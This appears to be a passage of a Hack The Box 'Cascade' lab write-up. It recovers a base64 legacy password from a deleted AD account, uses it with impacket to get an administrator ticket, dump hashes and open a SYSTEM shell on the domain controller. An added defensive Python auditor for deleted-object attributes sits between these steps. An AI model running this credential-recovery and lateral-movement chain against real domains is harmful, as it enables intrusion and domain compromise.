AD Recycle Bin
When I first enumerated the group membership of the arksvc account via BloodHound, I was very much confused, as the user didn’t appear to have any privilege-escalation vector.
I also didn’t think much of the AD Recycle Bin group, as it is not a default AD group.
Upon further research, I found out that AD Recycle Bin is a built-in AD feature that could potentially be used to list and recover AD objects.
According to Microsoft: The Active Directory (AD) Recycle Bin is a feature in Windows Server that helps recover deleted objects in an Active Directory environment. It retains deleted objects in the directory database, allowing administrators to restore them to their original state. The Recycle Bin supports granular recovery, enabling restoration of individual objects or entire organizational units. It requires a minimum domain functional level of Windows Server 2008 R2 and forest functional level of Windows Server 2008. Only users with appropriate administrative permissions can enable or disable the feature.
AD Recycle Bin being present as a domain group within the target domain strongly suggests that the group likely has either a GPO or an ACL configured to access this feature.
I can confirm this by using the PowerShell cmdlet available from the built-in AD module.
*evil-winrm* ps c:\Users> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
canonicalname : cascade.local/Deleted Objects
cn : Deleted Objects
created : 1/9/2020 3:31:39 PM
createtimestamp : 1/9/2020 3:31:39 PM
deleted : True
description : Default container for deleted objects
displayname :
distinguishedname : CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
instancetype : 4
iscriticalsystemobject : True
isdeleted : True
lastknownparent :
modified : 1/13/2020 1:21:17 AM
modifytimestamp : 1/13/2020 1:21:17 AM
name : Deleted Objects
objectcategory : CN=Container,CN=Schema,CN=Configuration,DC=cascade,DC=local
objectclass : container
objectguid : 51de9801-3625-4ac2-a605-d6bd71617681
protectedfromaccidentaldeletion :
sdrightseffective : 0
showinadvancedviewonly : True
systemflags : -1946157056
usnchanged : 65585
usncreated : 5695
whenchanged : 1/13/2020 1:21:17 AM
whencreated : 1/9/2020 3:31:39 PM
accountexpires : 9223372036854775807
badpasswordtime : 0
badpwdcount : 0
canonicalname : cascade.local/Deleted Objects/CASC-WS1
del:6d97daa4-2e82-4946-a11e-f91fa18bfabe
cn : CASC-WS1
del:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codepage : 0
countrycode : 0
created : 1/9/2020 7:30:19 PM
createtimestamp : 1/9/2020 7:30:19 PM
deleted : True
description :
displayname :
distinguishedname : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instancetype : 4
iscriticalsystemobject : False
isdeleted : True
lastknownparent : OU=Computers,OU=UK,DC=cascade,DC=local
lastlogoff : 0
lastlogon : 0
localpolicyflags : 0
logoncount : 0
modified : 1/28/2020 6:08:35 PM
modifytimestamp : 1/28/2020 6:08:35 PM
msds-lastknownrdn : CASC-WS1
name : CASC-WS1
del:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : computer
objectguid : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
objectsid : S-1-5-21-3332504370-1206983947-1165150453-1108
primarygroupid : 515
protectedfromaccidentaldeletion : False
pwdlastset : 132230718192147073
samaccountname : CASC-WS1$
sdrightseffective : 0
useraccountcontrol : 4128
usnchanged : 245849
usncreated : 24603
whenchanged : 1/28/2020 6:08:35 PM
whencreated : 1/9/2020 7:30:19 PM
canonicalname : cascade.local/Deleted Objects/Scheduled Tasks
del:13375728-5ddb-4137-b8b8-b9041d1d3fd2
cn : Scheduled Tasks
del:13375728-5ddb-4137-b8b8-b9041d1d3fd2
created : 1/13/2020 5:21:53 PM
createtimestamp : 1/13/2020 5:21:53 PM
deleted : True
description :
displayname :
distinguishedname : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/17/2020 9:35:46 PM, 1/17/2020 9:32:57 PM, 1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM...}
grouptype : -2147483644
instancetype : 4
isdeleted : True
lastknownparent : OU=Groups,OU=UK,DC=cascade,DC=local
modified : 1/28/2020 6:07:55 PM
modifytimestamp : 1/28/2020 6:07:55 PM
msds-lastknownrdn : Scheduled Tasks
name : Scheduled Tasks
del:13375728-5ddb-4137-b8b8-b9041d1d3fd2
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : group
objectguid : 13375728-5ddb-4137-b8b8-b9041d1d3fd2
objectsid : S-1-5-21-3332504370-1206983947-1165150453-1131
protectedfromaccidentaldeletion : False
samaccountname : Scheduled Tasks
sdrightseffective : 0
usnchanged : 245848
usncreated : 114790
whenchanged : 1/28/2020 6:07:55 PM
whencreated : 1/13/2020 5:21:53 PM
canonicalname : cascade.local/Deleted Objects/{A403B701-A528-4685-A816-FDEE32BDDCBA}
del:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
cn : {A403B701-A528-4685-A816-FDEE32BDDCBA}
del:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
created : 1/26/2020 2:34:30 AM
createtimestamp : 1/26/2020 2:34:30 AM
deleted : True
description :
displayname : Block Potato
distinguishedname : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
flags : 0
gpcfilesyspath : \\cascade.local\SysVol\cascade.local\Policies\{A403B701-A528-4685-A816-FDEE32BDDCBA}
gpcfunctionalityversion : 2
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}]
instancetype : 4
isdeleted : True
lastknownparent : CN=Policies,CN=System,DC=cascade,DC=local
modified : 1/26/2020 2:40:52 AM
modifytimestamp : 1/26/2020 2:40:52 AM
msds-lastknownrdn : {A403B701-A528-4685-A816-FDEE32BDDCBA}
name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
del:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : groupPolicyContainer
objectguid : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
protectedfromaccidentaldeletion : False
sdrightseffective : 0
showinadvancedviewonly : True
usnchanged : 196701
usncreated : 196688
versionnumber : 2
whenchanged : 1/26/2020 2:40:52 AM
whencreated : 1/26/2020 2:34:30 AM
canonicalname : cascade.local/Deleted Objects/Machine
del:93c23674-e411-400b-bb9f-c0340bda5a34
cn : Machine
del:93c23674-e411-400b-bb9f-c0340bda5a34
created : 1/26/2020 2:34:31 AM
createtimestamp : 1/26/2020 2:34:31 AM
deleted : True
description :
displayname :
distinguishedname : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
instancetype : 4
isdeleted : True
lastknownparent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
modified : 1/26/2020 2:40:52 AM
modifytimestamp : 1/26/2020 2:40:52 AM
msds-lastknownrdn : Machine
name : Machine
del:93c23674-e411-400b-bb9f-c0340bda5a34
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : container
objectguid : 93c23674-e411-400b-bb9f-c0340bda5a34
protectedfromaccidentaldeletion : False
sdrightseffective : 0
showinadvancedviewonly : True
usnchanged : 196699
usncreated : 196689
whenchanged : 1/26/2020 2:40:52 AM
whencreated : 1/26/2020 2:34:31 AM
canonicalname : cascade.local/Deleted Objects/User
del:746385f2-e3a0-4252-b83a-5a206da0ed88
cn : User
del:746385f2-e3a0-4252-b83a-5a206da0ed88
created : 1/26/2020 2:34:31 AM
createtimestamp : 1/26/2020 2:34:31 AM
deleted : True
description :
displayname :
distinguishedname : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
instancetype : 4
isdeleted : True
lastknownparent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
modified : 1/26/2020 2:40:52 AM
modifytimestamp : 1/26/2020 2:40:52 AM
msds-lastknownrdn : User
name : User
del:746385f2-e3a0-4252-b83a-5a206da0ed88
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : container
objectguid : 746385f2-e3a0-4252-b83a-5a206da0ed88
protectedfromaccidentaldeletion : False
sdrightseffective : 0
showinadvancedviewonly : True
usnchanged : 196700
usncreated : 196690
whenchanged : 1/26/2020 2:40:52 AM
whencreated : 1/26/2020 2:34:31 AM
accountexpires : 9223372036854775807
badpasswordtime : 0
badpwdcount : 0
canonicalname : cascade.local/Deleted Objects/TempAdmin
del:f0cc344d-31e0-4866-bceb-a842791ca059
cascadelegacypwd : YmFDVDNyMWFOMDBkbGVz
cn : TempAdmin
del:f0cc344d-31e0-4866-bceb-a842791ca059
codepage : 0
countrycode : 0
created : 1/27/2020 3:23:08 AM
createtimestamp : 1/27/2020 3:23:08 AM
deleted : True
description :
displayname : TempAdmin
distinguishedname : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenname : TempAdmin
instancetype : 4
isdeleted : True
lastknownparent : OU=Users,OU=UK,DC=cascade,DC=local
lastlogoff : 0
lastlogon : 0
logoncount : 0
modified : 1/27/2020 3:24:34 AM
modifytimestamp : 1/27/2020 3:24:34 AM
msds-lastknownrdn : TempAdmin
name : TempAdmin
del:f0cc344d-31e0-4866-bceb-a842791ca059
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : user
objectguid : f0cc344d-31e0-4866-bceb-a842791ca059
objectsid : S-1-5-21-3332504370-1206983947-1165150453-1136
primarygroupid : 513
protectedfromaccidentaldeletion : False
pwdlastset : 132245689883479503
samaccountname : TempAdmin
sdrightseffective : 0
useraccountcontrol : 66048
userprincipalname : TempAdmin@cascade.local
usnchanged : 237705
usncreated : 237695
whenchanged : 1/27/2020 3:24:34 AM
whencreated : 1/27/2020 3:23:08 AM
While I was able to confirm the group’s capability, a notable attribute caught my eye: cascadeLegacyPwd.
The cascadeLegacyPwd attribute was also present in the r.thompson user as an LDAP attribute.
The value also appears to be encoded in the base64 format.
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d
baCT3r1aN00dles
That definitely does look like a password.
According to the earlier email from the s.smith user, the password for the temporary account (TempAdmin) is the same as the normal admin account password.
This means that the above password likely belongs to the administrator user.
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-gettgt cascade.local/administrator:baCT3r1aN00dles -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in administrator.ccache
Yes, it indeed was. TGT created.
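The root cause in this section is a credential left in a custom attribute (cascadeLegacyPwd) of a deleted object that Recycle Bin readers can still list. The following is an added example for defenders, not part of the original write-up: it scans saved `Get-ADObject ... -Properties *` output for such attributes on deleted objects. The function names, the heuristic name list and the sample object OldSvc are assumptions of this example, and the sample data is constructed.

```python
import base64
import binascii
import re

# Assumed heuristics: secret-like name fragments, and look-alike standard attributes.
SECRET_NAME = re.compile(r"pwd|pass|secret|cred", re.I)
BENIGN = {"pwdlastset", "badpwdcount", "badpasswordtime"}
B64 = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
KEY_LINE = re.compile(r"\s*([A-Za-z][\w-]*)\s*:\s?(.*)")

def parse_objects(text):
    """Split 'name : value' output into one dict (lower-cased keys) per object."""
    objects, current, last = [], {}, ""
    for line in text.splitlines():
        m = KEY_LINE.fullmatch(line)
        if m and not line.strip().lower().startswith("del:"):
            key = m.group(1).lower()
            # Attributes are sorted by name, so a key that sorts earlier starts a new object.
            if current and key.replace("-", "") <= last.replace("-", ""):
                objects.append(current)
                current = {}
            current[key], last = m.group(2).strip(), key
        elif current and line.strip():
            current[last] += "\n" + line.strip()  # wrapped value, e.g. "DEL:<guid>"
    return objects + ([current] if current else [])

def decodes_to_text(value):
    """True if value is valid base64 whose bytes are all printable ASCII."""
    if not B64.fullmatch(value) or len(value) % 4:
        return False
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return all(0x20 <= b < 0x7F for b in raw)

def audit(text):
    """Return (object, attribute, reasons) per finding; values are never echoed."""
    findings = []
    for obj in parse_objects(text):
        if obj.get("isdeleted", "").lower() != "true":
            continue
        name = obj.get("msds-lastknownrdn") or obj.get("cn", "?").split("\n")[0]
        for key, value in obj.items():
            reasons = ["secret-like name"] if SECRET_NAME.search(key) else []
            if decodes_to_text(value):
                reasons.append("base64 of printable text")
            if reasons and value and key not in BENIGN:
                findings.append((name, key, reasons))
    return findings

# Constructed sample in the layout of the listing above; the value is made up.
FAKE = base64.b64encode(b"Constructed-Example-1").decode()
SAMPLE = ("cn : Deleted Objects\nisdeleted : True\nobjectclass : container\n"
          f"badpwdcount : 0\ncascadelegacypwd : {FAKE}\ncn : OldSvc\n"
          "del:00000000-0000-0000-0000-000000000001\n"
          f"info : {FAKE}\nisdeleted : True\nmsds-lastknownrdn : OldSvc\n"
          "objectclass : user\npwdlastset : 132245689883479503\n")
if __name__ == "__main__":
    print(audit(SAMPLE))
```

Any finding is a prompt to clear the attribute on the live schema and rotate the credential it held, since the value remains readable for as long as the deleted object is retained.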
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump 'CASCADE.LOCAL/@casc-dc1.cascade.local' -k -no-pass -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Cleaning up...
Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec 'CASCADE.LOCAL/@casc-dc1.cascade.local' -k -no-pass -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file krOBKGuo.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service jWCx on 10.10.10.182.....
[*] Starting service jWCx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
CASC-DC1
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter local area connection 4:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::e8dc:7157:1983:a2bd
link-local ipv6 address . . . . . : fe80::e8dc:7157:1983:a2bd%15
ipv4 address. . . . . . . . . . . : 10.10.10.182
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
10.10.10.2
tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
System Level Compromise